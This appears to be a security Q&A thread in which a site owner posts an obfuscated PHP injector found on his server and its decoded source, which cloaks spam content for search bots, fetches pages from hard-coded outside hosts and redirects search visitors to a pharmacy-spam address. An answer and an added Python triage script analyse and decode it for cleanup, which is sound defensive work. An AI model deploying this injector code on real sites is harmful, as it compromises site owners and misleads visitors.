Malicious PHP code: I need help analyzing it


I found something like this at the beginning of my PHP files on my server:

<?php eval(gzinflate(base64_decode('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')));?>

After decoding I got:

if (!defined('frmDs')){
    define('frmDs' ,1);
    error_reporting(0);

    function frm_dl ($url) {
        if (function_exists('curl_init')) {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            $out = curl_exec ($ch);
            if (curl_errno($ch) !== 0) $out = false;
            curl_close ($ch);
        } else {$out = @file_get_contents($url);}
        return trim($out);
    }

    function frm_crpt($in){
        $il=strlen($in);$o='';
        for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
        return $o;
    }

    function frm_getcache($tmpdir,$link,$cmtime,$toe=false){
        $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
        $fe = file_exists($f);
        if(!$fe || time() - filemtime($f) > 60 * $cmtime)
        {
            $dlc=frm_dl($link);
            if($fe && $dlc===false) 
                @touch($f);
            else
            {
                if($fe && empty($dlc) && $toe) 
                {
                    @touch($f);
                }
                else
                {
                    if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);}
                    else{return $dlc;}
                }
            }
        }
        $fc = @file_get_contents($f);
        return ($fc)?frm_crpt($fc):'';
    }

    function frm_isbot(){
        $ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
        if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; 
        $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
                    array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
                    array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247));
        foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
        if(!$ua)return true;
        $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
        foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
        $h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
        $hba=array('google','msn','yahoo');
        if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
        return false;
    }

    function frm_tmpdir(){
        $fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
        foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
            if ($t = getenv($v)) {$fs[]=$t;}
        }
        if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
        $fs[]='.';

        foreach ($fs as $f){
            $tf = $f.'/'.md5(rand());
            if($fp = @fopen($tf, 'w')){
                fclose($fp);
                unlink($tf);
                return $f;
            }
        }
        return false;
    }

    function frm_seref(){
        $r = @strtolower($_SERVER["HTTP_REFERER"]);
        $ses = array('google','bing','yahoo','ask','aol');
        foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
        return false;
    }

    function frm_havekey($s=false){
        $nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
        $k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s;
        if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return '';
        foreach ($nks as $n)if(preg_match("/(\b|_)$n(\b|_)/" , $k)) return $n;
        return '';
    }

    function frm_strtonum($Str, $Check, $Magic) {
        $Int32Unit = 4294967296;
        $length = strlen($Str);
        for ($i = 0; $i < $length; $i++) {
            $Check *= $Magic;
            if ($Check >= $Int32Unit) {
                $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
                $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
            }
            $Check += ord($Str{$i});
        }
        return $Check;
    }

    function frm_chhash($String) {
        $Check1 =frm_strtonum($String, 0x1505, 0x21);
        $Check2 = frm_strtonum($String, 0, 0x1003F);
        $Check1 >>= 2;
        $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
        $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
        $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
        $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
        $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
        $Hashnum = ($T1 | $T2);
        $CheckByte = 0;
        $Flag = 0;
        $HashStr = sprintf('%u', $Hashnum) ;
        $length = strlen($HashStr);
        for ($i = $length - 1;  $i >= 0;  $i --) {
            $Re = $HashStr{$i};
            if (1 === ($Flag % 2)) {
                $Re += $Re;
                $Re = (int)($Re / 10) + ($Re % 10);
            }
            $CheckByte += $Re;
            $Flag ++;
        }
        $CheckByte %= 10;
        if (0 !== $CheckByte) {
            $CheckByte = 10 - $CheckByte;
            if (1 === ($Flag % 2) ) {
                if (1 === ($CheckByte % 2)) {
                    $CheckByte += 9;
                }
                $CheckByte >>= 1;
            }
        }
        return '7'.$CheckByte.$HashStr;
    }

    function frm_chpr($url,$td){
        $ch=frm_chhash($url);
        $res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
        if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
    }

    function frm_red($k){
        if(!frm_isbot() && frm_seref()){
            $r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
            $s=@urlencode($_SERVER['HTTP_REFERER']);
            die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
        }
    }

    $tdir = frm_tmpdir();
    $isb=frm_isbot();
    $k=frm_havekey();
    $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
    if($cv=@$_POST[md5($host.'ch')]){exit($cv);}
    if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){
        $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
        $sp = "http://yoxvjkygff.rr.nu/stat/feed.php?pa=$parg&h=$host";
        //
        $tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
        if($isb && ($ppr = frm_chpr($tp)) > 1){
            $pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
            if($pc) die($pc);
        }
        //
        $ruri = strtolower($_SERVER['REQUEST_URI']);
        $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
        if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
            frm_red($k);
            die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
        }   
        if (($ruri=='/' || $ruri=='/index.php') && $isb) {
            $c=frm_getcache($tdir, $sp ,60*24);
            if($c)die($c);
        }
        //
        if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
            if(strpos($sdl, '|'.$ruri.'|') !== false){
                frm_red($k);
                die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
            }
        }
    }
    if($k) frm_red($k);
}

Can you help me and tell me what useful information I can get out of this?

    
posted by JayKey 26.11.2014 - 15:27

1 answer


I have actually seen this little piece of code (or something very similar to it) infecting a system before. At a high level, this code tries to look at traffic that meets certain criteria (bot status, source, keywords in the request, etc.) and downloads what can only be described as something between a black-hat SEO keyword list and an ad on the top of the page. It also uses a caching system, where it tries to store the rendered templates with the prefix "sess_". If you find a directory where write permissions are present, you should see some of these files, which will be interesting to review.

While it needs to be cleaned up and the attack vector patched, it is not the most harmful bit of code that is out there right now. The problem is that, once installed, nothing stops it from executing other kinds of code that could cause more trouble.

    
answered 26.11.2014 - 15:45
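To turn the question ("what useful information can I get out of this?") and the answer above into something you can run during cleanup, here is a Python triage script. It is an added example, not code from the original question or answer: it reproduces in Python the three pieces of the decoded script a responder cares about, namely unwrapping the eval(gzinflate(base64_decode('...'))) layer so every infected file can be decoded the same way, converting the integer IP ranges in frm_isbot() into dotted quads (the first range, 216.239.32.1 to 216.239.63.254, is Google address space, matching the user-agent and reverse-DNS checks that follow it), and locating the "sess_<md5>" cache files the answer mentions and undoing frm_crpt(), which is just every byte XORed with '*'. It also computes the POST parameter name md5($host.'ch') that the script answers with exit($cv), which an operator can use as a liveness probe. SAMPLE_PAYLOAD is a constructed test input built from three lines of the decoded code on this page; the feed URL, cache directory and spam content in demo() are constructed as well.

```python
"""Triage helper for the eval(gzinflate(base64_decode('...'))) injector above.

Added example, not part of the original question or answer. SAMPLE_PAYLOAD is
constructed from fragments of the decoded script; nothing here talks to the
network, it only decodes what the injector leaves on disk.
"""
import base64
import hashlib
import ipaddress
import os
import re
import tempfile
import zlib

WRAPPER_RE = re.compile(r"eval\(gzinflate\(base64_decode\('([A-Za-z0-9+/=\s]+)'\)\)\)")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)")
RANGE_RE = re.compile(r"array\((\d{7,10}),(\d{7,10})\)")

# Constructed sample payload: the bot-range array, feed URL and redirect
# target are copied from the decoded code in the question.
SAMPLE_PAYLOAD = r"""if (!defined('frmDs')){
    define('frmDs' ,1);
    $rs = array(array(3639549953,3639558142),array(1089052673,1089060862));
    $sp = "http://yoxvjkygff.rr.nu/stat/feed.php?pa=$parg&h=$host";
    die("<script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k\");</script>");
}"""


def build_sample():
    """Wrap SAMPLE_PAYLOAD the way the injector does: raw DEFLATE, then base64."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = comp.compress(SAMPLE_PAYLOAD.encode()) + comp.flush()
    b64 = base64.b64encode(raw).decode()
    return "<?php eval(gzinflate(base64_decode('" + b64 + "')));?>\n<html>site</html>\n"


def unwrap(php_source):
    """Return the plaintext hidden in eval(gzinflate(base64_decode('...'))), or None.

    PHP's gzinflate() is raw DEFLATE with no zlib/gzip header, hence wbits=-15.
    """
    m = WRAPPER_RE.search(php_source)
    if not m:
        return None
    blob = base64.b64decode(re.sub(r"\s", "", m.group(1)))
    return zlib.decompress(blob, -15).decode("latin-1")


def extract_hosts(decoded):
    """Hard-coded hosts the script contacts (feed, redirect target), first-seen order."""
    hosts = []
    for h in HOST_RE.findall(decoded):
        if h not in hosts:
            hosts.append(h)
    return hosts


def bot_ranges(decoded):
    """The frm_isbot() address whitelist as (first, last) dotted-quad pairs."""
    return [(str(ipaddress.IPv4Address(int(a))), str(ipaddress.IPv4Address(int(b))))
            for a, b in RANGE_RE.findall(decoded)]


def frm_crpt(data):
    """The script's 'encryption': every byte XORed with '*' (0x2a); self-inverse."""
    return bytes(b ^ 0x2A for b in data)


def cache_name(link):
    """File name frm_getcache() uses for a feed URL (scheme and host are dropped first)."""
    path = re.sub(r"^http://[^/]+", "", link)
    return "sess_" + hashlib.md5(path.encode()).hexdigest()


def liveness_param(http_host):
    """POST parameter name the injector echoes back via exit($cv): md5(host.'ch')."""
    host = re.sub(r"^www\.", "", http_host.lower())
    return hashlib.md5((host + "ch").encode()).hexdigest()


def find_cache_files(root):
    """Yield (path, decoded_bytes) for sess_<32 hex> files under root.

    frm_tmpdir() writes wherever it can (/tmp, wp-content/uploads, ./images ...),
    so scan the temp dirs and the web root. Genuine PHP session files are also
    named sess_*, so the decoded bytes are returned for a human to judge: spam
    HTML after the XOR means it is the injector's cache, not a session.
    """
    for dirpath, _, names in os.walk(root):
        for n in names:
            if re.fullmatch(r"sess_[0-9a-f]{32}", n):
                p = os.path.join(dirpath, n)
                with open(p, "rb") as fh:
                    yield p, frm_crpt(fh.read())


def demo():
    """Run the triage end to end on constructed files and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        infected = os.path.join(root, "index.php")
        with open(infected, "w", encoding="utf-8") as fh:
            fh.write(build_sample())
        feed = "http://yoxvjkygff.rr.nu/stat/feed.php?pa=abc&h=example.com"  # constructed
        with open(os.path.join(root, cache_name(feed)), "wb") as fh:
            fh.write(frm_crpt(b"<p>spam</p>"))  # constructed cache content
        with open(infected, encoding="utf-8") as fh:
            decoded = unwrap(fh.read())
        caches = {os.path.basename(p): c for p, c in find_cache_files(root)}
    return {"hosts": extract_hosts(decoded), "ranges": bot_ranges(decoded), "caches": caches}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a real box, run unwrap() over every .php file (the injector prepends itself, so the wrapper sits on line 1) and find_cache_files() over /tmp, /var/tmp and the document root; the decoded cache files show you exactly which spam pages were being served to crawlers, and the host list gives you what to block and what to search the access logs for.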
